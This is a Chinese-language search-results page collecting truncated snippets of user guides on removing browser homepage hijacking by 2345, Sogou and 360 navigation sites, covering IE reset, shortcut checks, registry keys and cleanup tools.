  • 网上试了几种解决方法,都不行,最后我用重置ie浏览器的方法解决了。我总结了一下,把各种方案都记下来,供以后开发时参考,相信对其他人也有用。 重置ie 打开ie浏览器-设置-internet选项-高级-重置。 基本上这样...
  • 360主页修复工具是一款有效防止主页被劫持的工具,如果你的主页被篡改无法手动设置主页的情况,那么这个款360主页修复工具能有效的解决这个问题,轻松解决主页被劫持的现象,下面一起看下360主页修复工具使用教程吧...
  • 最近电脑重装系统,结果发现从网上download的windows版本自带了各种七七八八的软件,我也没有在意,装好系统之后。...首先IE浏览器主页是2345导航,当时我就顺手在IE浏览器里面设置了一下设置为hao1...
  • 参考文章:https://jingyan.baidu.com/article/d169e186727470436611d883.html我的IE浏览器、360浏览器以及谷歌浏览器的桌面快捷方式均无法删除,而且主页篡改,打开后主页显示的是‘搜狗网址导航’。...
  • 浏览器主页被2345劫持简单处理方法

    千次阅读 2020-05-28 18:44:26
    应用-确定-重新打开IE浏览器 或者win+r运行regedit打开注册表找到这个值  HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main下  和HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet ...
  • 浏览bai器劫持是一种恶意程序,通过浏览器插件、BHO(浏览器辅助对象)、WinsockLSP等形式对用户的浏览器进行篡改,使用户的浏览器配置不正常,强行引导到商业网站。 所谓浏览器劫持是指网页浏览器(IE等)恶意...
  • 不光是ie浏览器会跳转搜狗,遨游浏览器也跳转搜狗。 按照通常的修改主页,修改快捷方式后缀的方法,均失败。 再尝试使用adwcleaner,仍然失败,无法解决跳转劫持问题。 然后怀疑会不会是dll动态库级别的劫持? 下载...
  • win7系统下IE浏览器主页被360/2345劫持了,已经不是原来的IE界面了,怎么修改都没办法恢复,怎么办呢?出现这样的情况一般是系统中植入了恶意软件或者系统设置不当造成的。下面给大家分享解决方法。 解决问题前,先...
  • 问题说明 前几天重新做了一个win7系统,没激活,就随便在百度上下载了一个激活工具,...看到这里,基本上知道了是浏览器主页被劫持了(不止火狐,chrome和IE都被干掉了)。就不喜欢这些花里胡哨的导航网址,现在更是
  • 最近新来了台笔记本电脑,重新装系统和必备软件,在使用火狐浏览器启动时主页被莫名其妙改成2345网站的主页(IE也是一样),在网上尝试了很多方式,什么修改注册表,什么搜索关键词,什么重装浏览器,什么锁定主页,...
  • 2345 网址导航劫持 解决办法

    万次阅读 2018-12-06 12:14:44
    用过软媒魔方的人大概都有所体会,这两家公司就是乌合之众,迟早要死翘翘。...1.排查IE浏览器快捷方式是否篡改 如果快捷方式后面没有 2345.com 的字样代表没有篡改,如下是没有篡改 2.排...
  • 1.遇到被劫持主页 在打开浏览器的快捷方式-->属性-->快捷方式-->目标,检察下是不是被修改了。 修复方式:删除桌面快捷方式,快速启动等快捷方式,然后在google浏览器安装路径,重命名chrome.exe,最后重新创建一个...
  • 北斗虚假IE图标专杀IE修复图标工具主页篡改病毒木马查杀 虚假IE图标专杀工具一键扫描清理主页篡改类...修复360SE、腾讯TT、遨游、火狐浏览器主页 修复”淘宝购物“篡改IE图标问题 http://blog.mdcsoft.cn/sms2011/

空空如也

空空如也

1 2
收藏数 35
精华内容 14
关键字:

ie浏览器主页被劫持